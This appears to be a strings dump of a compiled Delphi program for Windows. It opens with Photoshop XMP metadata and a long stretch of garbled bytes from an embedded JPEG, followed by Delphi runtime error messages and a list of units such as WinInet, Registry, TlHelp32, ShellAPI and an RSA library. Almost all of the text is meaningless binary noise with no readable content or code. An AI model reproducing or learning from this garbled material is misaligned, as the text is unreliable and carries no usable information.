stEvt:action="saved" stEvt:instanceID="xmp.iid:8E4A2F2233A7E51185848E2BA90986D7" stEvt:when="2015-12-20T19:07:17+03:00" stEvt:softwareAgent="Adobe Photoshop CS4 Windows" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>
!Adobe
 0"A#@P3$4
25%
1BR#
b3AQr
DTP
"2!BR
#30PA
Cs@q
j'$
080
 LLR*
a`0@+
 ``@
8 `@
zJ[P
!Z;
!`H
$B!
5$7
8I82
CiOM
f@$8% 
$8E
"4$(
mJ@
R A` 
FEJ P
`{]2
%G5
>7;1
(A`[,a `@
{IT
&DN_~
0 Lv
6>we;|
T)4CQ
>zu
~l'z>N
}7.(
E>to~fq
vsC 
pb}W
]Z.
o[b>o
z}}
l8X
lzha
 9]
GYG[0
_[n\
<^J#
C(Q
^3i
;w$
jjj
<tMd
:My
SU%
%Fl
.!SX
keU;|}Y]
/`x
!R9Y
}#H
95Vw
*43P
{6tq
9=O2\
\B}eOaE!@T
N"u
&V 
@eF
v4Y
u^W!
SW9
_LVw
ha=
y?[
y}]>
x|{>|Y
Lz8
kl{
UP;
N`R
\;m
&:u
+:tW
9pa"
vFe@=
;-3
E[*<
sr9
7nz
n,}p
B'K3
L.('
Q:QN
yt59Nx
p6z
t/.
D-f
/5tY
Vc\
Q]gt
ATX
WA5
Mtu2
D@f
w$U{2
e3V
!%J
NaD
;7X
jr1
Et8v
y"u3
N&kN
gO>
krM
hneWX;
QA!Ze
Rfy
xg,
fUG,
@T"
5W9z7y
]R(
wx}
tVv
SjT
^}N
$]hz
QW1
>uUz
Cvc
zyNN
B-=Q
Z|`{39
d]s
df{?;=
uQz
7'H
26x=tSY}GK
vz_
4z4
SgC
kec;
TSS
G:jt]a
KPr
nU1
TNn
;3z
'f<
Iq%T
[r;
#n|(n
yoa
>ns@
tP-AV
=M(
'+n
6_G}
+'R
=oc
e~Z>y
q$>
U7:
XV:
No'I
dB@H{
^-T
mEu;
#*5
7.#
, (
T%HV
oW7gE
7\ms
=_%
$iumth
w5:
\;s3n
l++
?s++?
wm3-m
]n?
j)K
GjY
6:qM
kKV/
WsR*
!4&
\,EC
mfH
#x{\
ujW
h!d
#4vf
OCc
gp#{wO
o$P^
k$P^
oja
g^*
p6C
W-9
VYO
|05
d+:
)&a
KYR8
}dQ&
Ls'
d,ka
0892
Zbao
f<Ms
Mhh
BSIX+
+!Y|d+
4"b
VSQ
%`/`
Bm\&
-Xj
Jjb>
la4"
VPN
95<
sP(99
VP(
(5m.>
B`O
VK,
7.H
g\s
l6&&
_Vn
Va6
(.+
XM*OtJiN
e64
9s]r
X.E
lQV
2F=
biN
`L++
AJ8D
1kc
JJ0
aa|
C|C
CN(
,Lztl
r.A9
.%5
 }K
'(8
B.)
Gz1
Aq\
(*C
QEr\
%r+
pMr.N+
D' Q)
.ay
IY+
}rW
/ Fp
yLA
6@QnP
A<=
7IM
pC(
XX\
_qm[
<s(
-1a5
%hX
Pa\
NAr\
VVVVVQ
j.bk0
(\d,(
peA"tET
6>*4Bp
>BG1
Y(e;)
er@
`x.tbV
f2\
8XF
sF@
/ N
i@.
7u!
vdQ
rrk
!txR?
Nhm
"Rr\
'96.)
44fc
y5$
"9bsu
d-e':( [
'}9^
=GI
HR1
l6)
D<O
2yIu
"SJp
JiG
sC\
rdH
rVh
B]5
S0b
-3N
43$5
qp<[
,0!
6S#
35Od
=yhc
V@Y@
9|2
l`i;
o2H#ko
qx*
02>!q
,,N
3]ZC
NXSB@
 ;+
/cX
!!%
Xn<
9@q
g[8k 
C\^
F68
"-D{pY
U6s
4<i
?N?P
IsB/
}+<
XXC
bpN
C-45
c|c
], 6EY
Hmf
iX@
6<=
@YYMp#
rYYE
chdq
0g |
+/qi
KUyy:W
mqL
Ny|
!>|:W
O[_
e C-
!tS8
p,q
O3\
`cBs
x7!
e:6
BkFx#
c@&&e
B?H
6~ 
-%5
Yrs
o*)
,.!
p\=r
KTr
d.E7(
VVS}Z
Qj!6"
,,.%p*6
{Tn
Mo4
=19
H[1
G_5
&89
YYNA
[Ut
2ECY}
}MgAy
<qnu
m5t
[_~-f
M/\
CWm9
qN(=rL(',
#j!<
5J2]/
Y9f
!r>
YO++(
Fdl&N
Gm,#Mi
ewkf
{r(
,V/K3YvV
[wn
$yS]
Cm5GG3
Lj)
Y+++
XXD
QD)
QyD
B,r
Njy
cy"
pF"
d.+
B S
58 
Xs$G
 P+
J/D
BDJ
`jq
VVS
R5aq\
54ex
`'4.+
YNiA
9,q\W
p%62
er(J
Jq%e2,
'=er
P`E
De4{4{
|y2
YY\
Q,,"X
db/b
rYY
q@d>
`\X
1d,
aee
rhD 
JthF
.+<Q
"P(
5qX@ 
aap
kQjsSZ
e6"
LaD 
!qX\W
a^%
X@{
VVP9N
q(0
%q+
yM+9L
(aee9
XXXX
+9L
}PN+)
8YY
%r\
"4d`RJ
zdLj
-NsJ
q\W
J.M
| Z@
0Fr
 =2
\QYA
/(H
%a}H
\VTM
@XXXD,{qD 
YD,g
g 0
crX
?*Or[
PQ!e
'eec
w49
__p
__p
__p
__p
__p
__p
z{/e
K"%
f?@
L,)
\PA
988
A\B
B?TS
s%cAq\$
2aG&NN[
65;j
,zc
mz-
jH^_x
#i~
 wKpZ
KpZ
KPZ
SiL
OL9aaa
Fec
peF)
M/t
{n,h
R|Q
'`'G
JlE6"K"
}si
j8"
<ss2E
!|q0
+Kbi
m6[y
Ys]{
{_J
4r[
sQV-m
+zM!v
zT&
}m-j
LB[W
>GV
]G}
-<vj
hYv
B/~
F9w}-
u'dz
ouR
i{LW]
KV+q
0EZ(
w}wE
,Rx
Z;+
duZ
=xtT
YRxk9
l4z
66a
(]0m
nAV
/#~
9;f
<;]a
7{hY
NK1
x9o 
qR1
aj|!v
dPf
bjlK
I[eM
qso
)F!{
\ajt!
}jHM
Scc
~]Q
-~A
[*J
soz
u|'@
mvM
jy>
4 vM
&/22
ZZ/
(m]X
WKi
mK/\
MO_O
K_k
vZ3v
ogUy
|jk
]wY
m7N1A
|nO
}#`
|W.
{=>
M'H
sSK
uvi
j-R
umn
^WF
O%H
+u~
?p@v
[:=O
SfM
[[Cg
\gQ
}K)
se/
n|o
VEJ
B..
EyX
g>'K
Yghh
:`e
{MY
^]8
X^.m
>-o
"CSNa>
']s
i{G
/k;-(
"m;n
a<O
iu}
5zk
~8e
e;i
{{]#
w\y
c9Cb
(\/"
|'1rc
ly.V
Slv
BR,
F=w
G+17&&!T8
C^h{v
:xkW
wkK
]{-X
$Qo
x{pr
]nv_
g_,
8bL
u<;
wCJ
x.G
F'vXA
6*w
GIDM5z
3>x
xtqi
{-(
SQP~I
i3`
+:[
c>\[*
oHh
w/.
?{7
Mr^
eeq
7;_
0OD
kq^
mW`
61-:Rj7
n/\
V]F
SUSe.
iA>
lh3c-
^kl
,yN
asQ
b'?[
emzW
]fK
cY7`
okb
D[I"cm=
gKYJ1Y
SKa
O<?
WuB
F-s
=Mj
ghY
5:=}}
eGF
u;U
~Ku]x
4z]
"e-^
WkD
VfK
roi
Tuz
tQu
}WZ
Rj=
};5fk
6.i
u}}x
{[j
Lrlbh
^Ae=
4sW
l:gQ
6{{]MX
&Wn
v1Q
3I<
f H^
tvt
ce}
V1G-9
Cf'
Z6t
-m_
dD:
&+M
Pdm
wbp
VLf;
l};{-
jCM
!Sb
70:7
Qm#
Loq_*
b`>I
wj{k
Z]^
];"
WeTQ
65[(
['Gf
7AvXc
y$Vt
8tM
b0G<
dtJ
ac`
5W+|
zUlP
9k[
}mh
='CY
<f'9
[;M
h6;{
,-c#t
gMdQ9
:Om
31>g
vf*
>y&
G$m
Lnv*w
ynw
aA5x
EX:
-S+
l6%
}$6
fFY|
$}q
vFK
Ntb
~(|
C`I
LD\,
7|V
|or
IW]
DO{
uXx
!"N
.6,
:g+
Ou`
9;|*@
e9X
Ca6&1
37* |
xZ_
ef1
v&q~a
U_k
@j:
Y@m
A>#
,uG
0{+
S;z
E[?
J"S
M`i$$
ooK
/+I
*k7
2cf
B:B
+{.
i5S,
fB<
]Ov
=bV
E\r,
++L#
{"z
&<\
_u_
_W2C8q
u{H
PeW
UX=
Ie9
S2+
|=i&;
LNE
f'.
u4N
u9;G
n^9
@JY@
y_2
6|?
GT}
=ew
KTS
?tW
t~&]
f<|
^.$V
se^"
&"1
R5;Y
 yy1&b
6n..
7Tb
8w}U
pnz
OUg
rfi
Xf.
#?YI
b1.
CLwc
8S;
b:z
D~&
c?yDY
xGJv`
1=;
VW8Y
\B#/YO
xG/
LUY
/$HY
koM
i0wP
<H@q
9a!1Y
rOi?
 iYv
.a8
4ZFYAK
9p&{
{*e
/2U
.PA
uE9[d6
9q}
\H6
UmO
6.he
e5`
:Hu
fy,
_wJ
[2{kf
[:s-
RoON
m[|
,YI
w'r~e
7t*
/PI
6xG
o,l(
jM 0
g,^E
,L,
nC0
)wO
ps3
:v-
;V-
QN&
pT3
Dyq
6K7
D%8
d;&#
JcnnQ
G$u&w
r|[%-9
/Z1qx
hW1
Lz3,
GsWNfb
.cf
C/o
enF
e`W
Rg,y
++,wVOJl})
DT<
vm$V
_Vz
wq-
kR<
3>X
]Ko
z=)
K)d
f}Z2
iL,
IF[
y;yr
}}=t
B`p
UEH
;,q
'oF+
@N/
NZG
>&wC
BD%
5o!qir
.-.]
5'p
ajl
2G{
z1g
qX3
-"L
=o+b
oF-
e5eD\
k{$
I|S
mm<
Tsa3
 ?G
[Yl
@`;
 qr
N}c
b..
zV8
e4B.
'.$
&r)`
=83
jw&
Hb/
X;D
(pm|)
u`#$
vJN
v&x
KJ-
I3a
V<O$=
o#&
;p,\
oJg
#lg
lQb
ff%
,V?j
#c;r
5u4
MVx
@@;
Ue;
_3nl
z*k*
FYO
1V"P
z~g
(|5c
MGh
-.]>
mFY
}jC
x{3q
 /W
@u]
xF:/
Fvn
9.=
m^"
b^#
%UubDV7/w
_SdN
|M'
nYs
/r+
M%[
eis7
o3!
Zw&A,
2^?
{9}
{YS
!ij
qqx
#%*
Ie\
tT+7
8~\ye
l\)
PF~
D@^
DS 
kus*x
;TV-
Y}>F
X?F
7Kt7G
gX3tl
8Lg
b#<
>,p
YcNq
<vv
LNE<
<FC
of3
S<x
\s/f
IFYe
FS8
qc9
G[Ks
$g"
Y{8]
xV#
`};9
&F8fq
7 O
KVA
hlq
iEn
eEn
i%n
',L
"$~
V&C
Nyf<
ff3
1XG
1cr
Ws}p
0cL
mqL
:$Z<
L?_
YLD
X[\
GS\D
SlS
wgun
K:i
1sI
yq2
YAD
B-P2K((
@e?
3<bxq
F>,
cLveW
00S1
DF_
Ogf3
M)38
R^,Y
7+&1
ZHf
ALe
"iog
~V:
PV&
M?+
'nc
@M-
JK*r
GiT\x
GiT\x
!0E
tBQ
ol`
3$:xD{BX`
e11
bbq1
~,2
 !S"xAL
bdd
dfb#
E0FG9
g33
dJ3
1-8
bxg
f;xv
_n& 9A
"dq
05e
%#SY4
522b
unW
fZr3
NCNy`
oFET
Xq=B8tt
|ug
v7ctI
HfdDg.
M5[9
Wt1
skc
=G}
 To2
nyl]
S=JH
YLG&
T,`f
g2$
lWR
Rq#4
%s/
VI:#
g9~Y
nq8
2Zp
&ra
r"b
8hE
fg)>
M8m
Qom9
9A+l
-!bZ=
Nc<
e1<r
n U*0
gq}
%Dl
M8;n
B&}.
q5Iq
.=;
StBipEA"Yv
 bf
\uh
54m
Yxqd
fR5
5S<b3
RG2-n|
/69
z`?z6W
"._c
J"r
&8e4
yvRDX
[`w
TGJ
FxN
#V:
TtF
Fg?
)Ug
Ns,J
#"p
Q*edTg
 eq
,CJ&
<5yF
`K(
&S<"$
\Nr
yc<
#Tp
nwwm
T22
`*E
F$s:')
\S 31
_unv
e,}
.2[
 YOg
"c2%
&13:
|"5
;F2e
.!9s
yur
Fr\
o/_
fN=
c6L
p;u
Q|8
ATg
"k4
5i*+
FW$P,
(:i
xpZ9
XZo`
ZE6rh
fl5
'8)
X2M
fff
tLDfA
+i(L
LbX
Ne5G
Xc.
]rj
'*s
,Cm
1e"Q
pgH
dBR=
+x\
kep
Tn"!gt|
anZ
~L~?
KMw
Yw~
+_T
Q&d7
P\Z
|S8
39i
fc?
+ID
F"7">^
9vvp
yfJ{
m:~
c9\
(>q
bf&f5G
onX
p!l
G%^
'E5SP
.Wpf*
BCW6
P7}
2/x
 w=
,s+
:4W
c3aUok
.o3
bfZ
<|8
N&2
A19g
UM5
Ap,
p3!
Fww%
5f$
DHFq
e^fC#L
&$_
<5Kd
Pjr
;gX
| W$
-Y 
p!v
nJv/
y`g
^]>]v
Czu
{$*
XISMD"<
~LD
g,g
:fN"
Cfbs
3&q
DEQ
gNR9I{
,/8
<g=
vE #
r$D]
*LW&
MD^2!
Y&~
OwoA
PWp+
~<u
aX~
\#!
g]\
g[*
Qfd_I
+2b
ygl
RQ]
D@DFQ
~,e33
bq31
&#<vO
.&2
9[/
DL0
&"H&
!*yw
^7P
^fb
!/0
f;1
~XcK
&D#
QSV
'`MVN
FGh
KM5
yi!`
iul*x
5V#
n-u
0+'
^_3
^/dr6-
S).S
'[/D
:zu
iw$
fffdlc
qgw
RR1
f3?
 c(
"1un
sZm
Lfr
)\9h9
>0(
%Ww
YDDK+wOl
tah
T5[Hb
[b8
"MY
_SO
EeB
pr<
yp9q
l|1
_4j
ew,
JLN(
-^?
Qsqf
Fql
5n YQ
[uS
[7h[A
Xy{a
PIc\T
{#r2
a?4
JYD
@_7
aEb#
V:c
BU1
6R#
Ixh
MqL
f9G
_^]q
b#n
f32
b"b$
-U?
DNs
pC3
a_w
q$v
fHD
qIR
&Q#
kkWV
dGq
fAJ
&B$CIk
pE?
UUV
jwR
Y*j
G#)
D6.7
}6/
h'(B
C$)
E/`@zt
pzV
Xo&
hz9S
OUt
Q#.
(\EP4
W}4
<&(
|~D
/OR
3;uDvi
]GV-
gFY
U1R
M q+
eQN
Ue9
ALLF
/zhY2=Cr
NUDL
F>N#g
ZK<
:h>
8%J
E<c
,^t
-7Sd
pnWX>
'(H
kxY
eHe
z7J
dbH
A2Cl
@,s
gh%
9M4
i"7/{u
+[Z
iHt
kkl
KH0
b~,O
<br.
]kX@
3-5h
07Sp
_P+&
Z17
?Mmf
3.b
 c9
KKS
ik;
rS7
BU*J
,e'
<&&2
t^-w
)wA
6:F~0
B-w
qFD
 s=
Q;A
6no
Q1D
gz0
R}0
onC{}
qGf
DOdDLD
DC$
" f
rW$b0c
-gX
d~)
WozI
E"`
Ts 1{
[)q
k{Q
&E(
GPZ
,@-
1aE
f24
tWZ
vdCth
n\S
2!CX"5
w{o
;X%
Dbb"?
I{g
1K(u
zIK
VL7
n(\
GR"
0-$
,:H
[94u9
8\>
2[>
<ve
bf$x
8NQ
Uf\~
B%SZ#
nP]q
@nQ
niL
iu#O%T
"(WJ
colF
#r\&r
!f0y
cM:
Wx4
}>q
q6]G
Ut<
$0V
(?N
J.7.M@6
=aQi/{Q/
<u&&
1BZf 
MFffo2#g
"#O
'QS
D~H
<)>i
\I{BZpR@1'
hNq3
vJ:
lz5
mcj
v.m
c")[
ukn
(6z
h{n
IH[
.,m
:Ln
A[:U&4
jPM Y,
#;t
~~L>
_$aM@B@
0^SC
gi6
o[w
g>:
jkQ#
#KK
h/al
AIh
SISF
L:?
n-q
DJW(
.Ty
R"D|
*01
lT{+$
b"f
|S?
YDO.X
f"?
q33
Lvb`Dc>%
UOn
<xN'9
H;KY
e+ 
lol
v{v
Bmn
{xN
aMK
.IckY
D|E
4}5
JeW
4/_p
},T
<"t
uU[
#MZ
=?p
-tZ
<[g
U$5
HR#ld
d1w
JUj
.I$
qL!
FD1?
b"5D
eILG
.'8
<FQ
e>)
1q3
\y2
G33?
`b8
Qj1
d_6
B)[
)":>
[1O0
ji2
)Z-
gsY
{nM}A
{f>
K-V
%Mr6_U
uKq
?Qs 
elFP~
b%]^
:~p
!  
&K]
-Zj-?
uig
bd4
r*i
%C!G1>
oEl
-D%
!%N\
TS^
xHtS
r\|
<~f
`Uo
b}3
:"f
G#Q{%
TN[
a6{V
>U|
)?L%!''#
E%'[
rL1*
`Q(
j|5|
XaAF
f-8i
csw(YAQ=
9~<
$a&&u
CC0
!XrSG
Yzy[
dG1
f")
"s3
!%e
.&>p
F~*i
f&}4
E_7
|`g_
Le:
ISMT
M8%
DVe+6
NJ(
fm=S
K'O1
N+1
F3s$-h
"KT(
J\4
$&T
FD;a_!n{
x5Z
*MT
%r'%H
k:?Htkv
Q{:9H
_=a
G&3
=ZGn
%3_&
~<\R
DB""4
ZTeSW
ytw
6K$w
 "x
`c(
q129
M!&H$
S%P
i*X:
9FaG
QpD
AIk
#yl
=xE
UU>
g^"
@&Fr 
dzOi
Yh!
R$19f1$\
$^f
esZ
O5EJ
.%m
Nd4
JA{j`\
5i*
d-LEB0#
hH*
B%V
l3ff
m"[f
@`E6
U32M
.T3
x%G
~,gw
[30
(*H
`br
e39e
j:#
f>.\e
cZl%6
# R
_!a
TA.
%&U
!c`
fZK
E#6
ML~
D"B
V@EH
j"-#
 9y
/;pN
1Fu
[9T
000
g8rT
fB#4M
Q.vQ
(,6A
AR&<
C3>
4fS_
.@msP
'xH
DIa_{
[Eo
g"9
LEGY
VD#K*!
) "XQE`n
azn
%;Bp
"pL
cis
UBL!
x) 
UT#Y
s)R
L7q
faT
&C@
<vH
m$"
GS*"
*CUm?w
_8}
+K9?J
i%\Rj
USW
6HdrbX$
a/o
s%@
g;y
1"Te
X$U
Ch!
7_5
mZrZ/
 -TR
p[\
30;
,i1
[(>
h07
nnm
Q^`
&+!f
(D*V
WZB
mUy
"2t
>Vx+
KXR
=lI>5
"9QH
&8J
c0m
o;~
f$l
'9%
c$DE
"YO%E
)#ND5
B2t
"(9
&K 
lG>/z
[1od
0A6
cuH
D]ZK]
=x++
stIL
YSH
JN?x2
$0g_
Byw{
!pF@`
bD^
_tqnHSX
LIeR
nIj
q-BU
@8"
JD5|
cQas"
A.H
pKle
f2d
CC}TE&k
GkueP
;D@Z) Qr
8Vu
\Bf
zzi!`
[I1)|DD
T2CS4j:
3gR
HV%
*Ht
 *+
LXZ
QIP
kf9
*%,
F*yR
0QT%Oz
nKn
/Ex
c-_C
SBX
6Mm\
mBu
nM"
SsZ
XB"
"!b
I2c3
wB&$
bFb`
4W_:
l_& l
+*w
Qj a
V!C
a} 
MCYk
*e"
H`W
4h0
&fn8q!
QS:j-
Jw3
%H]
G%aI
hm[
"mS
8[90
}"/
F#>
jIi[
[h!
IN^B
qist
,%b
ucUJ
E`V
'ND*
 "4
UjN
aT,
[83e
zj]uVJ`s
HLL
R2L
bB{"
*6/
w1d
5y)z
Qi%,
EI-
6wEB
t79
r7&
aB]
AL]#
QEz|
akwf
T1D
QE&
R+i@
eq;
5y,!
tV"
3+&]
lA>
GTFBG
)Q:
xE^
@\Q
G8-Z
buH
X.[P
2'4
`W*
u&d&
|H)
1v,8N
rC3.
91{l
BA0
h*&
2F05
8dIw
tD+r#W0
6VQ
"g"
& 3-d
G4N
`)B
$TB
B&8O
~N%
4bE-
`0S
L-Y
PBS
EEp
1A$
fb'
cQ{T
f;-
.!p
4{8!
:@JH
Qql
#ueM
,*L
y.R
e[e
]N&y
M"+/
Bk!
,5h
0@)
MH0
BbK
yp@
Mt`
sW8i
s"Ot
0"e0
`Zj
Ij(
~e8cD
*D}
D^"
_?W
eJ8
D&%
a y
0Mar$
PBeQ
ffG
 RS-
~k+
2mL
5K&
&>h}
)0@
rcn@
WJh
0eT
P8k
BCd
|K9
&Nv
%Vp4
~f:i%
f${t
M<{
B{!
F~0
bS)1
e0"%
X;p
)if
bg<
0kT
dUFc
k**
,LZ
j`i
[@s
,!a"
fydt
5*dI
00#
Fz?
D/:Q\s
#).<
xy>
6Ic
"!=faW
Eil
I&%(
PEIRfC
>|E
?hM
^DM
oh?
CO=
TWm
,mj
}D(Ul`o
efjjBd&b.
MZ7C
/,yH
.cefz
L@WT
#0%"\>W
EsT
b`2s@
eqY
MpL
=>Z
/gM|
c%H
F\Ght
x~[
g%aq
>gp
}1v
(hl
"51
ak>U
OUB
Hw(
?=`
X]\>
6"w
OBV
5yli
PD"DD
,m2"z
i&1
&Mb0D;C
P@-
6i*
KU%J
5WV5(w`
I{f~]!
{fh
d9S
!Qs
LRE:GV2
Fu'
0Q3$u
;yF
gM5m
3ht
/I%
y['
(2Yzfz
ZM u
kvs
jDA
H)#Qs
QEd
TBT
k=o
FnC
"#Y
$U3
<s3
q,=
' Zj
YxDG
g|11
v5Vk
*hf52.
=bT
$:yG
Zi 
=09
`f>
B24
VC6
h3 
nSH@
&b$n)
)r[\
ed&
1*G
acq
!"Mm
yXG
uyo
cGx
~PT
Lzku
3]5
rB@i[
fW]2
-62
00%D,
+J!t
epQ
5@&B-
|`DD
Sqx
f+0
v.3"d
w76|
s=2'uu
jEW
'!"
_wza!
aLR
zq/`+
1bwFv
]]=4.
r?I^:E
WJh
G23":
Yol
rD<
o10
atH
ZGP{
w9q
;yx
]dF%
6%G'
R"0T
7$r
CY3
Lbj
bX*
g0#
4k=
0G!(
:+g9
 f`3*
B d
2"~
33'0A
fbr
#W|
wG_"
"C!Q
FBZ
;cVB(
bz*
X@)
T{th
k<\
,A`t
S;3n-k
Xyg
Pmg
xi.
gO-
"dZ*
nSq@
B\K:Hs
1M8+
TdB9f
BQ1
40D
0|]
"Y0s$dS1
aQ0
5ND
aWs^
$X7;y
LW3
0^g(
6j1
:k*MtW
Xj[
,[_
"w&
QvT
-*`U
(%D
K [@5U
Yqpc
df+\
/M*
30#
( \U
bJK).n
|w1
b3"
{$W
.b:>O
Q2d1
tGO
'3-
uDR;
=RD
31!
c9g
:yu
C-C
2fuLdr\K
ooQ
hn@
){e
KU-
* J
1%5
|C-f
PZ2
cf"
gTA2
1&Jf
bKZ
(c$
p4D
8*C1
X"v
+aIP
JLWW
YE9j
]4n{8
HeO
u3B-
hNs
ZEvs
H* 
[9N
d@D[u
diB
F9p
sa6
503
CM8
M@:
SMb
JVC5P
1B 
+ld
m V
3Ip(
g9.?
p\x
8g?;
S09
$uM3
-)*r%6c1
VrFZEC
];R
NYg
];zNt
$DF
H`t
<xZ
XR !
3HS
*.q
CZG\
mIN
&#\
zVu
d#M:
j!=
t` d
&Aj
^=tn/F<
E%UZ
k*N
kLk
=9A
C?G
OPF
$~:
[(R
EM>_7
Edlg
a:|T
hBnaPzn
Yk(
Q1As
P0yLf
zU.
H$fK"
;s2\
ydSp
&3p
HRpk
'fw
:GU>
K"X
juby6& 
iTt
]^%
GTH
fZpH
2GI
$C2
;Vf
"=zJ
`.eAn
Fw8E
B'#\
#13
M:9
R5G
*9uPG
&c8
c9\
MDz
DMK
Ue^DQ
+CJb$V
`"~]E
 R3#
&fYM
NDYE:
f&2
2em
s]db82
+Kx&
WO(i
rb,
-US
^A@
dFr
Vs#
cNf
uPE
G]{k/
">f
VBt
%U5n
QREU>
h85
p>^/z
 $"
0dF:y
u#m
{yp!
WrV
fqL
cY003
s1%33
ff"bJ2
$fg(
Y|C
(]0
{1+c
`ZC
77Q9ID@
FLV9
"'!
S00Z
W1j
t2$
Nd&'
fEP,
/i~d
$J%
g"1I
e$^
x&1V
"72
9pnP
nXR2P
n.%
35g:
1]c
-`k
.@n
%>T
Mjp,
"$U
rCp`
0G1U
#$,"aE
EG|
>hH
d3"a
" "f&r
"!-
K^p
s'MG
0Q&P
e{|
kYi
`^.
uDC2
fER
d!S>H
fN!A
UuS
<HgtL`
DB=
6d"
!*YV
`aN
H.v
M$&
m(3Z
H/p+
QXV
G>,!!
eUEH
B'G
u4.
QXZ
@-`
e!3
{m6
X2"
C_v
1qm
d<)T
NEF
_-L
rK 
@2!
dL\
FQ9g
uNz
NM8k
TAFf?
*VY
5Cn
bD 
LZ2
yHFoi
3dl
=$Tab
9*L
F"6Y
f%BR
gXTP
J`H
Rs3
c2'
-ZKN3
KEbe*
m"5
k>J+
jeZ
0$(
vZ:K
<O3!*
BZ4
\ I`m
od"
+pk#
h<<A
g#x
R5R
D;l
}``
0m#V
P5m
+1l0
.\g3
0n\T
f$E
{N%
5N;
TeQ
Gl4
)>FQZ
Ei1[
Wcl
q<J
E:u
gp& XRz
L:H6
ru2
GtV
n(g
#B-
Md5
]29
k$}
nba&
$EOu
<x[
xl^
sjT
'Mf`
Qns'
QE'
$J$
*Hy
CU<
E-h[
]UF
Z1i
HCW
Zh3
>ml
s2K%
g0=
3\2
-#Z
VR6
#2R19
&Q3
 !iH
s+,
=V{{
ETe
w9i
dn'
7?W
3Vt
1&(
pBM
Oks 
Ln~
h1g
{g.H
snmf
C==;
U(]
'z4
"n*
?tY
ooy
NSuN
:tn
?mW
;fI
kwgI
19m
);8Eco
fT6~
a3r
3mu
(sU
?R,u
yVU
yc.
5mnM
'N 
\I$q
VA]U
X=C
fk\Nj
ru"H.Q
5QD
k_75{?
H%1;SH
s*)
Sw?S
gp{b
/wO/?
JPEG Image File
Bitmap image is not valid
Icon image is not valid
Metafile is not valid
Invalid pixel format
Scan line index out of range!Cannot change the size of an icon
Unsupported clipboard format
Out of system resources
Canvas does not allow drawing
Metafiles
Enhanced Metafiles
Icons
Bitmaps Clipboard does not support Icons&Cannot change the size of a JPEG image
JPEG error #%d
%List does not allow duplicates ($0%x)%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
Stream read error
Failed to create key %s
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
Stream write error
Mon
Tue
Wed
Thu
Fri
Sat
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
Unable to create directory
Cannot assign a %s to a %s*Can't write to a read-only resource stream
Oct
Nov
Dec
January
February
March
April
May
June
July
August
September
October
November
December
Sun
Interface not supported
Exception in safecall method
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error.  Code: %d.
A call to an OS function failed
Jan
Feb
Mar
Apr
May
Jun
Jul
Aug
Sep
Write$Error creating variant or safe array)Variant or safe array index out of bounds
Variant or safe array is locked
Invalid variant type conversion
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Variant overflow
Invalid argument
Invalid variant type
Operation not supported
Unexpected variant error
External exception %x
Assertion failed
Floating point division by zero
Floating point overflow
Floating point underflow
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Access violation
Stack overflow
Control-C hit
Privileged instruction(Exception %s in module %s at %p.
%s%s
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Read
!'%s' is not a valid integer value
Invalid argument to time encode
Invalid argument to date encode
Out of memory
I/O error %d
File not found
Invalid filename
Too many open files
File access denied
Read beyond end of file
Disk full
Invalid numeric input
Division by zero
Range check error
Integer overflow Invalid floating point operation
&=O8
AProject2
IniFiles
"RTLConsts
System
SysInit
KWindows
UTypes
SysUtils
SysConst
^Classes
3Messages
CVariants
$VarUtils
QTypInfo
sActiveX
JConsts
Consts
Math
?WinInet
8Registry
TlHelp32
*ShellAPI
+Graphics
Rjpeg
FGIntPrimeGeneration
FGInt
FGIntRSA
Unit2
